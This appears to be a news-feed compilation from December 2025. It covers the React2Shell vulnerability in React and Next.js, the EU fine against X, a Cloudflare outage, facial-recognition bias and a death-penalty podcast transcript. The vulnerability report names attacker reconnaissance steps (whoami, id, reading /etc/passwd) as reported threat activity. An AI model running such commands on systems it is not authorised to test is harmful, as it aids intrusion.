For the Next.js framework, there is the identifier CVE-2025-66478, but the tracking number was rejected in the National Vulnerability Database's CVE list as a duplicate of CVE-2025-55182.
The security issue is easy to leverage, and several proof-of-concept (PoC) exploits have already been published, increasing the risk of related threat activity.
The vulnerability spans several versions of the widely used library, potentially exposing thousands of dependent projects. Wiz researchers say that 39% of the cloud environments they can observe are susceptible to React2Shell attacks.
React and Next.js have released security updates, but the issue is trivially exploitable without authentication and in the default configuration.
React2Shell attacks underway
A report from Amazon Web Services (AWS) warns that the Earth Lamia and Jackpot Panda threat actors linked to China started to exploit React2Shell almost immediately after the public disclosure.
"Within hours of the public disclosure of CVE-2025-55182 (React2Shell) on December 3, 2025, Amazon threat intelligence teams observed active exploitation attempts by multiple China state-nexus threat groups, including Earth Lamia and Jackpot Panda,"
reads the AWS report
.
AWS's honeypots also caught activity not attributed to any known clusters, but which still originates from China-based infrastructure.
Many of the attacking clusters share the same anonymization infrastructure, which further complicates individualized tracking and specific attribution.
Regarding the two identified threat groups, Earth Lamia focuses on exploiting web application vulnerabilities.
Typical targets include entities in the financial services, logistics, retail, IT companies, universities, and government sectors across Latin America, the Middle East, and Southeast Asia.
Jackpot Panda targets are usually located in East and Southeast Asia, and its attacks are aimed at collecting intelligence on corruption and domestic security.
PoCs now available
Lachlan Davidson, the researcher who discovered and reported React2Shell, warned about fake exploits circulating online. However, exploits confirmed as valid by Rapid7 researcher
Stephen Fewer
and Elastic Security's
Joe Desimone
have appeared on GitHub.
The attacks that AWS observed leverage a mix of public exploits, including broken ones, along with iterative manual testing and real-time troubleshooting against targeted environments.
The observed activity includes repeated attempts with different payloads, Linux command execution (
whoami
,
id
), attempts to create files (
/tmp/pwned.txt
), and attempts to read '
/etc/passwd/
.'
"This behavior demonstrates that threat actors aren't just running automated scans, but are actively debugging and refining their exploitation techniques against live targets," comment AWS researchers.
Attack surface management (ASM) platform Assetnote has released a
React2Shell scanner on GitHub
that can be used to determine if an environment is vulnerable to React2Shell.
Elon Musk’s X fined €120m by EU in first clash under new digital laws
Guardian
www.theguardian.com
2025-12-05 11:25:42
Ruling likely to put European Commission on collision course with billionaire, and possibly Donald Trump Elon Musk’s social media platform, X, has been fined €120m (£105m) after it was found in breach of new EU digital laws, in a ruling likely to put the European Commission on a collision course wit...
Elon Musk’s social media platform, X, has been fined €120m (£105m) after it was found in breach of new EU digital laws, in a ruling likely to put the
European Commission
on a collision course with the US billionaire and potentially Donald Trump.
The breaches, under consideration for two years, included what the EU said was a “deceptive” blue tick verification badge given to users and the lack of transparency of the platform’s advertising.
The commission rules require tech companies to provide a public list of advertisers to ensure the company’s structures guard against illegal scams, fake advertisements and coordinated campaigns in the context of political elections.
In a third breach, the EU also concluded that
X
had failed to provide the required access to public data available to researchers, who typically keep tabs on contentious issues such as political content.
The ruling by the European Commission brings to a close part of an investigation that started two years ago.
The commission said on Friday it had found X in breach of transparency obligations under the Digital Services Act (DSA), in the first ruling against the company since the laws regulating the content of social media and large tech platforms came into force in 2023.
In December 2023, the commission
opened formal proceedings
to assess whether X may have breached the DSA in areas linked to the dissemination of illegal content and the effectiveness of the measures taken to combat information manipulation, for which the investigation continues.
Under the DSA, X can be fined up to 6% of its worldwide revenue, which was estimated to be between $2.5bn (£1.9bn) and $2.7bn in 2024.
Three other investigations remain, two of which relate to the content and the algorithms promoting content that changed after Musk bought Twitter in October 2022 and rebranded it X.
The commission continues to investigate whether there have been breaches of laws prohibiting incitement to violence or terrorism.
It is also looking into the mechanism for users to flag and report what they believe is illegal content.
Senior officials said the fine broke down into three sections: €45m for introducing a “verification” blue tick that users could buy, leaving others unable to determine the authenticity of account holders; €35m for breaches of ad regulations; and €40m for data access breaches in relation to research.
Before Musk took over Twitter, blue ticks were only awarded to verifiable account holders, including politicians, celebrities, public bodies and verified journalists in mainstream media and established new media, such as bloggers and YouTubers. After the takeover, users who subscribed to X Premium were then
eligible for blue tick status
.
Henna Virkkunen, who is the executive vice-president at the European Commission responsible for tech regulation, said: “With the DSA’s first non-compliance decision, we are holding X responsible for undermining users’ rights and evading accountability.
“Deceiving users with blue checkmarks, obscuring information on ads and shutting out researchers have no place online in the EU.”
The ruling risks enraging Trump’s administration. Last week the US commerce secretary, Howard Lutnick, said the EU must consider its tech regulations in order to get 50% tariffs on steel reduced.
His threats were branded “blackmail” by Teresa Ribera, the EU commissioner in charge of Europe’s green transition and antitrust enforcement.
Senior EU officials said the ruling was independent of any pleadings by the US delegation in Brussels last week to meet trade ministers. They said the EU retained its “sovereign right” to regulate US tech companies, with 25 businesses including non-US companies such as TikTok coming under the DSA.
Musk – who is
on a path to become the world’s first trillionaire
– has 90 days to come up with an “action plan” to respond to the fine but ultimately he is also free to appeal against any EU ruling, as others, such as Apple, have done in the past, taking their case to the European court of justice.
At the same time, the EU has announced it has secured commitments from TikTok to provide advertising repositories to address the commission concerns raised in May about transparency.
The DSA requires platforms to maintain an accessible and searchable repository of the ads running on their services to allow researchers and representatives of civil society “to detect scams, advertisements for illegal or age-inappropriate”.
Senior officials said the phenomenon of fake political adverts or ads with fake celebrities cannot be studied unless the social media companies stick to the rules.
X has been approached for comment. The EU said the company had been informed of the decision.
Cloudflare outage hits major web services including X, LinkedIn and Zoom – business live
Guardian
www.theguardian.com
2025-12-05 11:19:46
Cloudflare reports it is investigating issues with Cloudflare Dashboard and related APIs Technical problems at internet infrastructure provider Cloudflare today have taken a host of websites offline this morning. Cloudflare said shortly after 9am UK time that it “is investigating issues with Cloudfl...
Global websites down as Cloudflare investigates fresh issues
Technical problems at internet infrastructure provider Cloudflare today have taken a host of websites offline this morning.
Cloudflare
said shortly after 9am UK time that it “is investigating issues with Cloudflare Dashboard and related APIs [application programming interfaces – used when apps exchange data with each other]”.
Cloudflare
has also reported it has implemented a potential fix to the issue and is monitoring the results.
But the outage has affected a number of websites and platforms, with reports of problems accessing LinkedIn, X, Canva – and even the DownDetector site used to monitor online service issues.
Last month, an outage at Cloudflare made many websites inaccessible for about three hours.
Jake Moore
, global cybersecurity adviser at
ESET
, has summed up the problem:
“If a major provider like Cloudflare goes down for any reason, thousands of websites instantly become unreachable.
“The problems often lie with the fact we are using an old network to direct internet users around the world to websites but it simply highlights there is one huge single point of failure in this legacy design.”
The Metro newspaper reports that shopping sites were affected by the Cloudflare IT problems too – such as Shopify, Etsy, Wayfair, and H&M.
H&M’s website is slow to load right now, but the other three seem to be working…
Today’s Cloudflare outage is likely to intensify concerns that internet users are relying on too few technology providers.
Tim Wright,
technology partner at
Fladgate
, explains:
“Cloudflare’s latest outage is another reminder that much of the internet runs through just a few hands. Businesses betting on “always-on” cloud resilience are discovering its single points of failure. Repeated disruptions will draw tougher scrutiny from regulators given DORA, NIS2, and the UK’s emerging operational resilience regimes.
Dependence on a small set of intermediaries may be efficient but poses a structural risk the digital economy cannot ignore. We can expect regulators to probe the concentration of critical functions in the cloud and edge layers — while businesses rethink whether convenience has quietly outpaced control.”
Cloudflare
insists the problem was not a cyber attack; instead, it appears to have been caused by a deliberate change to how its firewall handles data requests, made to fix a security vulnerability.
Cloudflare
says:
This incident has been resolved.
A change made to how Cloudflare’s Web Application Firewall parses requests caused Cloudflare’s network to be unavailable for several minutes this morning. This was not an attack; the change was deployed by our team to help mitigate the industry-wide vulnerability disclosed this week in React Server Components. We will share more information as we have it today.
Edinburgh Airport suspends all flights after IT issue with air traffic control
An IT issue affecting air traffic control has forced Edinburgh Airport to halt all flights today.
Edinburgh Airport said in a statement:
“No flights are currently operating from Edinburgh Airport.
“Teams are working on the issue and will resolve as soon as possible.”
The Airport’s departure page
is showing eight flights delayed and five cancelled, but passengers for many other flights are being told to go to the gate.
Reports of problems at Cloudflare peaked at just after 9am UK time:
A chart showing reports of problems with Cloudflare
Photograph: Downdetector
Online video conferencing service Zoom, and Transport for London’s website (used for travel information in the capital), are among the sites hit by the Cloudflare outage.
In a separate cereal supply and demand report, the FAO raised its global cereal production forecast for 2025 to a record 3.003 billion metric tons.
That’s up from 2.990 billion tons projected last month, mainly due to increased estimates for wheat output.
The FAO’s forecast for world cereal stocks at the end of the 2025/26 season has also been revised up to a record 925.5 million tons, reflecting expectations of expanded wheat stocks in China and India as well as higher coarse grain stocks in exporting countries.
World food prices fall for third month in a row
Global food prices have fallen for the third month running.
The UN’s Food Price Index, which tracks a basket of food commodities, dropped by 1.2% in November, thanks to a drop in the cost of dairy products, meat, sugar and vegetable oils.
That could help to push down inflation, if these reductions are passed onto consumers.
Photograph: UN FAO
However, cereal prices rose by 1.8% last month, due to “potential Chinese interest in supplies from the United States of America, concerns over continuing hostilities in the Black Sea region, and expectations of reduced plantings in the Russian Federation”, the
UN’s Food and Agriculture Organisation
reports.
Vegetable oil prices
fell by 2.6% in the month, to a five-month low, due to prices of palm, rapeseed and sunflower oils.
Meat prices
dropped by 0.8%, driven by lower pig and poultry meat prices and the removal of tariffs on beef imports into the US.
Photograph: UN FAO
Dairy prices
fell by 3.1% in November, thanks to rising milk production and abundant export supplies in key producing regions, supported by ample butter and skim milk powder inventories in the European Union and seasonally higher output in New Zealand.
Sugar prices
dropped by 5.9% in the month, and were almost 30% lower than a year ago, as expectations of ample global sugar supplies in the current season pushed down prices. Strong production in Brazil’s key southern growing regions, a good early season start to India’s harvest and favourable crop prospects in Thailand all contributed.
European shares higher ahead of US PCE inflation report
European stock markets are ending the week on the front foot.
The main European indices are a little higher this morning; Germany’s
DAX
is up 0.55%, France’s
CAC
40
is 0.3% higher, and the UK’s
FTSE
100
has risen by 0.14%.
Investors are waiting for new US inflation data later today (1.30pm UK time), which could influence interest rate expectations ahead of next week’s US Federal Reserve meeting.
Kyle Rodda,
senior financial market analyst at
capital.com,
says:
Risk assets are cautiously edging higher to round out the week, with US PCE Index data in focus this afternoon.
Ultimately, the markets appear to be looking for a signal that it’s all clear to keep moving higher again. That signal could come from data. But given the lack of it between now and the middle of next week, it’s more likely to come from the FOMC decision.
The current implied probabilities of a cut are 87%, according to FedWatch – swaps markets suggest a little higher. The markets won’t just want to see a cut delivered but also some dovish enough language and forecasts about the prospect of future cuts. Another hawkish cut, like that which was seen in October, could upset the apple cart, if it were to occur.
Nevertheless, European stocks have run with a broadly positive lead-in from Asian markets, with US futures also pointing higher.
Netflix is in competition with Paramount Skydance and Comcast, which owns assets including Universal Studios and Sky, to buy the owner of the Hollywood studio
Warner Bros
, HBO and the HBO Max streaming service.
Netflix is offering a $5bn (£3.7bn) breakup fee if the deal fails to gain regulatory approval in the US, according to Bloomberg, which first reported the exclusive talks.
Ocado shares jump 11% after agreeing $350m payment from Kroger
Shares in Ocado have jumped by over 10% at the start of trading, after it agreed a compensation deal with US grocer Kroger.
Ocado is to receive a one-off $350m cash payment from
Kroger
, which decided last month to close three robotic warehouses which use the UK company’s high-tech equipment, in Maryland, Wisconsin, and Florida.
This morning, though, they’ve jumped to the top of the
FTSE
250 index, up 11.5% to 206p.
Ocado
had previously said it expected to receive more than $250m in compensation from
Kroger
.
But it has also revealed today that
Kroger
has decided to cancel another tie-up with Ocado – a planned automated distribution centre run on the UK group’s technology in Charlotte, North Carolina.
Last month, retail analyst
Clive
Black
of
Shore
Capital
said Ocado was “being marginalised as most of its customer fulfilment centres do not work economically in the USA”.
Ocado says it continues to “work closely” with Kroger on five other customer fulfillment centres in US states such as Texas and Michigan.
Tim Steiner
, CEO of
Ocado
Group
, has said:
“We continue to invest significant resources to support our partners at Kroger, and to help them build on our longstanding partnership. Ocado’s technology has evolved significantly to include both the new technologies that Kroger is currently deploying in its CFC network, as well as new fulfilment products that bring Ocado’s technology to a wider range of applications, including Store Based Automation to support ‘pick up’ and immediacy.”
“Our partners around the world have already deployed a wide range of these fulfilment technologies to great effect, enabling them to address a wide spectrum of geographies, population densities and online shopping missions, underpinned by Ocado’s world leading expertise and R&D capabilities. We remain excited about the opportunity for Ocado’s evolving products in the US market.”
House prices predicted to rise in 2026, after budget uncertainty
Halifax’s Amanda Bryden
reckons UK house prices will rise “gradually” next year, saying:
“Looking ahead, with market activity steady and expectations of further interest rate reductions to come, we anticipate property prices will continue to grow gradually into 2026.”
Karen Noye
, mortgage expert at
Quilter
, says affordability remains the biggest hurdle, even though inflation has eased and another interest rate cut is expected later this month, adding:
“The outlook for 2026 rests on the path of mortgage rates and the resilience of household incomes. Greater clarity post budget and the prospect of lower borrowing costs give the market a firmer footing, but affordability will remain the defining constraint.”
Tom Bill
, head of UK residential research at
Knight
Frank
, says pre-Budget uncertainty pushed house price growth close to zero, adding:
“Clarity has now returned, but an array of tax rises, which include an income tax threshold freeze, will increasingly squeeze demand and prices. Offsetting that is the fact that mortgage rates are expected to drift lower next year as the base rate bottoms out at around 3.25%.”
Technically, UK house prices did rise
slightly
last month. On Halifax’s data, the average price was £299,892, marginally up from £299,754 in October. That’s a new record high on this index.
Halifax: a clear North/South divide on house price changes
Halifax’s regional data continues to show a clear North/South divide – prices fell in the south of the UK last month, but were stronger elsewhere.
Northern Ireland
remains the strongest performing nation or region in the UK, with average property prices rising by +8.9% over the past year (up from +7.9% last month). The typical home now costs £220,716.
Scotland
recorded annual price growth of +3.7% in November, up to an average of £216,781. In
Wales
property values rose +1.9% year-on-year to £229,430.
In England, the
North
West
recorded the highest annual growth rate, with property prices rising by +3.2% to £245,070, followed by the
North
East
with growth of +2.9% to £180,939. Further south, three regions saw prices decrease in November.
In
London
prices fell by -1.0%, the
South
East
by -0.3% and
Eastern
England
by -0.1%. The capital remains the most expensive part of the UK, with an average property now costing £539,766.
Introduction: UK house prices stagnated in November, weak retail spending too
Good morning, and welcome to our rolling coverage of business, the financial markets and the world economy.
As the first week of December draws to a close, we have fresh evidence that the economy cooled in the run-up to last month’s budget.
UK house prices were broadly unchanged in November, lender
Halifax
reports, with the average property changing hands for £299,892. That stagnation follows a 0.5% rise in October, and makes houses slightly more affordable to new buyers.
On an annual basis, prices were 0.7% higher – down from +1.9% house price inflation in October.
Amanda Bryden
, head of mortgages at
Halifax
, explains:
“This consistency in average prices reflects what has been one of the most stable years for the housing market over the last decade. Even with the changes to Stamp Duty back in spring and some uncertainty ahead of the Autumn Budget, property values have remained steady.
While slower growth may disappoint some existing homeowners, it’s welcome news for first-time buyers. Comparing property prices to average incomes, affordability is now at its strongest since late 2015. Taking into account today’s higher interest rates, mortgage costs as a share of income are at their lowest level in around three years.
A chart showing UK house prices
Photograph: Halifax
Shoppers also reined in their spending in the shops last month.
A survey by business advisory service BDO has found that in-store sales grew by just +1.3% in November, despite the potential sales boost from Black Friday.
That is well below the rate of inflation, which means that sales volumes are significantly down, BDO says.
The agenda
7am GMT: Halifax house price index for November
7am GMT: German factory orders data for October
8.30am GMT: UN food commodities price index
3pm GMT: US PCE inflation report
3pm GMT: University of Michigan consumer confidence report
LISP STYLE & DESIGN explores the process of style in the development of Lisp programs. Style comprises efficient algorithms, good organization, appropriate abstractions, well-constructed
function definitions, useful commentary, and effective debugging. Good design and style enhance programming efficiency because they make programs easier to understand, to debug, and to maintain.
A special feature of this book is the large programming example that the authors use throughout to illustrate how the process develops: organizing the approach, choosing constructs, using abstractions, structuring files, debugging code, and improving program efficiency. Lisp programmers, symbolic programmers or those intrigued by symbolic programming,
as well as students of Lisp should consider this book an essential addition to their libraries.
Molly M. Miller is Manager of Technical Publications and Training for Lucid, Inc. She holds degrees in Computer Science, Mathematics, and English and has done graduate work in symbolic and heuristic computation at Stanford University.
Eric Benson is Principal Scientist at Lucid, Inc. He is a graduate of the University of Utah with a degree in mathematics and is a co-founder of Lucid.
Home Office admits facial recognition tech issue with black and Asian subjects
Guardian
www.theguardian.com
2025-12-05 11:11:18
Calls for review after technology found to return more false positives for ‘some demographic groups’ on certain settingsUK politics live – latest updatesMinisters are facing calls for stronger safeguards on the use of facial recognition technology after the Home Office admitted it is more likely to ...
Ministers are facing calls for stronger safeguards on the use of facial recognition technology after the
Home Office
admitted it is more likely to incorrectly identify black and Asian people than their white counterparts on some settings.
Following the latest testing conducted by the National Physical Laboratory (NPL) of the technology’s application within the police national database, the Home Office said it was “more likely to incorrectly include some demographic groups in its search results”.
Police and crime commissioners said publication of the NPL’s finding “sheds light on a concerning inbuilt bias” and urged caution over plans for a national expansion.
The findings were released on Thursday, hours after Sarah Jones, the policing minister, had described the technology as the “biggest breakthrough since DNA matching”.
Facial recognition technology scans people’s faces and then cross-references the images against watchlists of known or wanted criminals. It can be used while examining live footage of people passing cameras, comparing their faces with those on wanted lists, or be used by officers to target individuals as they walk by mounted cameras.
Images of suspects can also be run retrospectively through police, passport or immigration databases to identify them and check their backgrounds.
Analysts who examined the police national database’s retrospective facial recognition technology tool at a lower setting found that “the false positive identification rate (FPIR) for white subjects (0.04%) is lower than that for Asian subjects (4.0%) and black subjects (5.5%)”.
The testing went on to find that the number of false positives for black women was particularly high. “The FPIR for black male subjects (0.4%) is lower than that for black female subjects (9.9%),” the report said.
The Association of Police and Crime Commissioners said in a statement that the findings showed an inbuilt bias. It said: “This has meant that in some circumstances it is more likely to incorrectly match black and Asian people than their white counterparts. The language is technical but behind the detail it seems clear that technology has been deployed into operational policing without adequate safeguards in place.”
The statement, signed off by the APCC leads Darryl Preston, Alison Lowe, John Tizard and Chris Nelson, questioned why the findings had not been released at an earlier opportunity or shared with black and Asian communities.
It said: “Although there is no evidence of adverse impact in any individual case, that is more by luck than design. System failures have been known for some time, yet these were not shared with those communities affected, nor with leading sector stakeholders.”
The government announced a 10-week public consultation that it hopes will pave the way for the technology to be used more often. The public will be asked whether police should be able to go beyond their records to access other databases, including passport and driving licence images, to track down criminals.
Civil servants are working with police to establish a new national facial recognition system that will hold millions of images.
Charlie Whelton, a policy and campaigns officer for the campaign group Liberty, said: “The racial bias in these stats shows the damaging real-life impacts of letting police use facial recognition without proper safeguards in place. With thousands of searches a month using this discriminatory algorithm, there are now serious questions to be answered over just how many people of colour were falsely identified, and what consequences this had.
“This report is yet more evidence that this powerful and opaque technology cannot be used without robust safeguards in place to protect us all, including real transparency and meaningful oversight. The government must halt the rapid rollout of facial recognition technology until these are in place to protect each of us and prioritise our rights – something we know the public wants.”
The former cabinet minister David Davis raised concerns after police leaders said the cameras could be placed at shopping centres, stadiums and transport hubs to hunt for wanted criminals. He
told the Daily Mail
: “Welcome to big brother Britain. It is clear the government intends to roll out this dystopian technology across the country. Something of this magnitude should not happen without full and detailed debate in the House of Commons.”
Officials say the technology is needed to help catch serious offenders. They say there are manual safeguards, written into police training, operational practice and guidance, that require all potential matches returned from the police national database to be visually assessed by a trained user and investigating officer.
A Home Office spokesperson said: “The Home Office takes the findings of the report seriously and we have already taken action. A new algorithm has been independently tested and procured, which has no statistically significant bias. It will be tested early next year and will be subject to evaluation.
“Given the importance of this issue, we have also asked the police inspectorate, alongside the forensic science regulator, to review law enforcement’s use of facial recognition. They will assess the effectiveness of the mitigations, which the National Police Chiefs’ Council supports.”
Lethal Illusion: Understanding the Death Penalty Apparatus
Intercept
theintercept.com
2025-12-05 11:00:00
Malcolm Gladwell and Liliana Segura unpack how the death penalty is administered in America.
The post Lethal Illusion: Understanding the Death Penalty Apparatus appeared first on The Intercept....
As of December 1,
officials across the U.S. have executed 44 people in 11 states, making 2025 one of the deadliest years for state-sanctioned executions in recent history. According to the Death Penalty Information Center,
three more people
are scheduled for execution before the new year.
The justification for the death penalty is that it’s supposed to be the ultimate punishment for the worst crimes. But in reality, who gets sentenced to die depends on things that often have nothing to do with guilt or innocence.
Historically, judges have disproportionately sentenced Black and Latino people to death. A new
report
from the American Civil Liberties Union released in November found that more than half of the 200 people exonerated from death row since 1973 were Black.
Executions had been on a
steady decline since their peak in the late 1990s
. But the numbers slowly started to
creep back up
in recent years, more than doubling from 11 in 2021 to 25 last year, and we’ve almost doubled that again this year. Several states have stood out in their efforts to ramp up executions and conduct them at a faster pace — including
Alabama
.
Malcolm Gladwell’s new podcast series “
The Alabama Murders
” dives into one case to understand what the system really looks like and how it operates. Death by lethal injection involves a three-drug protocol: a sedative, a paralytic, and, lastly, potassium chloride, which is supposed to stop the heart. Gladwell explains to Intercept Briefing host Akela Lacy how it was developed, “It was dreamt up in an afternoon in Oklahoma in the 1970s by a state senator and the Oklahoma medical examiner who were just spitballing about how they might replace the electric chair with something ‘more humane.’ And their model was why don’t we do for humans what we do with horses?”
Liliana Segura
, an Intercept senior reporter who has covered
capital punishment
and criminal justice for
two decades
,
adds that the protocol is focused on appearances. “It is absolutely true that these are protocols that are designed with all of these different steps and all of these different parts and made to look, using the tools of medicine to kill … like this has really been thought through.” She says, “These were invented for the purpose of having a humane-appearing protocol, a humane-appearing method, and it amounts to junk science.”
Listen to the full conversation of The Intercept Briefing on
Apple Podcasts
,
Spotify
, or wherever you listen.
Transcript
Akela Lacy:
Malcolm and Liliana, welcome to the show.
Malcolm Gladwell:
Thank you.
Liliana Segura:
Thank you.
AL:
Malcolm, the series starts by recounting the killing of Elizabeth Sennett, but very quickly delves into what happens to the two men convicted of killing her, John Parker and Kenny Smith. You spend a lot of time in this series explaining, sometimes in graphic detail, how the cruelty of the death penalty isn’t only about the execution, but also about the system around it — the paperwork, the waiting. This is not the kind of subject matter that you typically tackle. What drew you to wanting to report on the death penalty and criminal justice?
MG:
I wasn’t initially intending to do a story about the death penalty. I, on a kind of whim, spent a lot of time with Kate Porterfield, who’s the psychologist who studies trauma, who shows up halfway through “The Alabama Murders.”
I was just interviewing her about, because I was interested in the treatment of traumatized people, and she just happened to mention that she’d been involved with the death penalty case — and her description of it was so moving and compelling that I realized, oh, that’s the story I want to tell. But this did not start as a death penalty project. It started as an exploration of a psychologist’s work, and it kind of took a detour.
AL:
Tell us a little bit more about how the bureaucracy around the death penalty masks its inherent cruelty.
MG:
There’s a wonderful phrase that one of the people we interviewed, Joel Zivot, uses. He talks about how the death penalty — he was talking about lethal injection, but this is also true of nitrogen gas — he said it is the impersonation of a medical act. And I think that phrase speaks volumes, that a lot of what is going on here is a kind of performance that is for the benefit of the viewer. It has to look acceptable to those who are watching, to those who are in society who are judging or observing the process.
It is the management of perception that is compelling and driving the behavior here — not the actual treatment of the condemned prisoner him/herself. And once you understand that, oh, it’s a performance, then a lot of it makes sense.
One of the crucial moments in the story we tell is, where there is a hearing in which the attorneys for Kenny Smith are trying to get a stay of execution, and they start asking the state of Alabama, the corrections people in the state of Alabama to explain, did they understand what they would do? They were contemplating the use of nitrogen gas. Did they ever talk to a doctor about the risks associated with it? Did they ever contemplate
any of the potential side effects
? And it turns out they had done none of that. And it makes sense when you realize that’s not what they’re interested in.
They’re interested in the impersonation of a medical act, not the implementation of a medical act. The bureaucracy is there to make it look good, and that was one of the compelling lessons of the piece.
AL:
And it’s impersonating a medical act with people who are not doctors, right? Like people who are not, do not have this training.
MG:
In that hearing, there’s this real incredible moment where one of the attorneys asks the man who heads Alabama’s Department of Corrections, did you ever consult with any medical personnel about the choice of execution method and its possible problems? And the guy says no.
You just realize, they’re just mailing it in. Like they have no — the state of Alabama is not interested in exploring the kind of full implications of what they’re doing. They’re just engaged in this kind of incredibly slapdash operation.
AL:
Liliana, I wanna bring you in here. You’ve spent years reporting on capital punishment in the U.S. and looked into many cases in different states. Why are states like Florida and Alabama ramping up the number of executions? Is it all politics? What’s going on there?
LS:
That is one of the questions that I think a lot of us who cover this stuff have been asking ourselves all year long. And to some degree, it’s always politics. The story of the death penalty, the story of executions, so often really boils down to that.
We are in a political moment right now where the
climate around executions
, certainly, but I think in general, the kind of appetite for or promotion of vengeance and brutality toward our enemies is really shockingly real right now. And I was reluctant about a year ago to really
trace our current moment to Trump
. The death penalty has been a
bipartisan project
; I don’t want to pretend like this is something that begins and ends with somebody like Trump.
That said, it’s really shocking to see the number of executions that are being pushed through, especially in Florida. And this is something that has been ramped up by Gov. DeSantis for purely political reasons. This
death penalty push in Florida
began with his political ambitions when he was originally going to run for president. And I think that to some degree is a story behind a lot of death penalty policy, certainly going back decades, and certainly speaks to the moment we’re in.
I did want to just also touch on some of what Malcolm was talking about when it comes to the performance of executions themselves. Over the past many years, I’ve reported on litigation, death penalty trials, that have taken place in states like Oklahoma and here in Tennessee where I live, where we restarted executions some years ago after a long time of not carrying any out. And these trials had, at the center, the three-drug protocol that is described so thoroughly in the podcast.
It is absolutely true that these are protocols that are designed with all of these different steps and all of these different parts — using the tools of medicine to kill — and made to look like this has really been thought through. But when you really trace that history — as you do, Malcolm, in your podcast — there’s no there there.
These were invented for the purpose of having a humane-appearing protocol, a humane-appearing method, and it amounts to junk science. There was no way to test these methods. Nobody can tell us, as you described in your podcast, what it feels like to undergo this execution process. And I think it’s really important to remember that this is not only the story of lethal injection, this is the story of executions writ large.
When the electric chair came on the scene generations ago, it was also touted as the height of technology because it was using electricity and it was supposed to be more humane than hanging. There had been botched hangings that were seen as gruesome ordeals. So there’s this bizarre way in which history repeats itself when it comes to these methods that are promoted as the height of modernity and humanity — and it’s just completely bankrupt and false.
AL:
Malcolm, do you want to add something?
MG:
Yeah. The case I’m describing, Kenny Smith’s, was notorious because he had a botched execution where they couldn’t find a vein. And one of the points that Joel Zivot makes is that, of course, it’s not surprising that, in that case and in many others, they can’t find a vein, because that is a medical procedure that is designed to be undertaken in a hospital setting by trained personnel
with
the cooperation of the patient. Usually we’d find a vein, and the patient cooperates because we’re trying to save their life or make them healthier. This is a use of this procedure that is completely different. It is outside of a medical institution, not being done by people who are experienced medical professionals, and is not being done with the cooperation of the patient. The patient in this case is a condemned prisoner who is not in the same situation as someone who’s ill and trying to get better.
AL:
I want to just walk our listeners through this. So this is, again, one of the pieces of the series, this three-drug protocol. First there’s a sedative, then there’s a paralytic, and then there’s finally potassium chloride, which is supposed to stop the heart. How did that protocol come to be developed?
MG:
It was dreamt up in an afternoon in Oklahoma in the 1970s by a state senator and the Oklahoma medical examiner who were just spitballing about how they might replace the electric chair with something “more humane.”
And their model was, well, why don’t we do for humans what we do with horses? Which was a suggestion that had come from Ronald Reagan, then governor of California. So they just generally thought, well, we can do a version of what we do in those instances, only we’ll just ramp up the dose. These drugs are also sometimes used as a kind of anesthesia.
AL:
This is advertised as something that is supposed to be painless.
MG:
And these drugs were also in use in the medical setting, but their idea was, we’ll take a protocol that is loosely based on what is used in a medical setting and ramp up the doses so that instead of merely sedating somebody, we’re killing them.
“ It wasn’t thought through, tested, analyzed, peer-reviewed. It was literally two guys.”
And it wasn’t thought through, tested, analyzed, peer-reviewed. It was literally two guys, dreaming up something on the back of an envelope. And one of the guys, the medical examiner, later regretted his part in the whole procedure, but the genie was out of the bottle. And everybody jumped on this as an advance over the previous iteration of killing technology.
AL:
In addition to being advertised as painless, it’s also supposed to be within the bounds of the Eighth Amendment protection against cruel and unusual punishment. Can you tell us about that?
MG:
In order to satisfy that prohibition against cruel and unusual punishment, you have to have some insight as to what the condemned prisoner is going through when they are being subjected to this protocol. The universe of people engaged in the capital punishment project was universally indifferent to trying to find out how exactly this worked. They weren’t curious at all to figure out, for example, was there any suffering associated with this three-drug protocol, or which of the three drugs is killing you? I could go on and on and on.
They just implemented it. And it looked good from the outside: once you have given someone a sedative and a paralytic, it’s impossible to tell from the outside whether they’re going through any kind of suffering. So it was just assumed that there must be no suffering going on on the inside.
And the Eighth Amendment does not say that people should not be subjected to the appearance of cruel and unusual punishment. It says, no, the actual punishment itself for the individual should not be cruel and unusual. So at no point in the early history of this did anyone truly satisfy the intent of the Eighth Amendment.
AL:
Liliana, you’ve written a lot about this protocol as well, and the Supreme Court
has taken a stance on it
. Tell us about that.
LS:
So one thing that’s really important to understand about the Eighth Amendment and the death penalty in this country is that the U.S. Supreme Court has weighed in on the death penalty numerous times, but has never invalidated a method of execution as violating the Eighth Amendment ban on cruel and unusual punishment. And that fact right there I think speaks volumes.
But one of the cases that I go back to over and over again in my work about lethal injection and about other execution methods dates back to the 1940s, and it’s a case involving a man named Willie Francis, a Black teenager who had been condemned to die in Louisiana. They sent him to the electric chair in 1946, and he survived. He survived their initial attempts to execute him. It was a grotesque ordeal; there’s been a lot written historically about this.
In that case, they stopped the execution. He
appealed to the U.S. Supreme Court
, and a majority of justices found that attempting to kill him again wouldn’t violate the Eighth Amendment. They sent him back in 1947, and they succeeded in killing him. But the language that comes out of the court in this case really goes a long way toward helping us understand how we ended up where we are now. They essentially said, “Accidents happen. Accidents happen for which no man is to blame.” And there’s another turn of phrase that’s really galling, in which they essentially call this ordeal that he suffered “
an innocent misadventure
.” And this language, this idea that this was an innocent misadventure finds its way into subsequent rulings decades later.
So in 2008, I believe it was, the U.S. Supreme Court took up the three-drug protocol, which at the time was being used by Kentucky. This was a case called
Baze v. Rees
. There was a lot of evidence, there was a lot that the justices had to look at that should have given them pause about the fact that this protocol was not rooted in science. That there had been many botched executions — in terms of the inability to find a vein, in terms of evidence that people were suffering on the gurney.
The U.S. Supreme Court upheld that protocol, and yet right around the time that they handed down that ruling, states began tinkering with the lethal injection protocol that had been the prevailing method for so long.
Without getting too deep in the weeds, the initial drug — the drug that was supposed to anesthetize people who were being killed by lethal injection — had been originally a drug called
sodium thiopental
, which was believed, for good reason, to be something that could basically put a person under, so that they wouldn’t necessarily feel the noxious effects of the subsequent drugs.
States were unable to get their hands on this drug for a number of reasons, and subsequently began swapping out other drugs to replace that drug. And different states tried different things. A number of states eventually settled on this drug called
midazolam
, which is a sedative that does not have the same properties as the previous drug — and over and over again, experts have said that this is not a drug that’s going to be effective in anesthetizing people for the purpose of lethal injection.
The Supreme Court once again took this up. In Oklahoma, this was the case Glossip v. Gross, which the Supreme Court heard after there had been a very high-profile, really gruesome botched execution of a man named
Clayton Lockett
who was executed in 2014. This ended up going up to the Supreme Court. And I
covered that oral argument
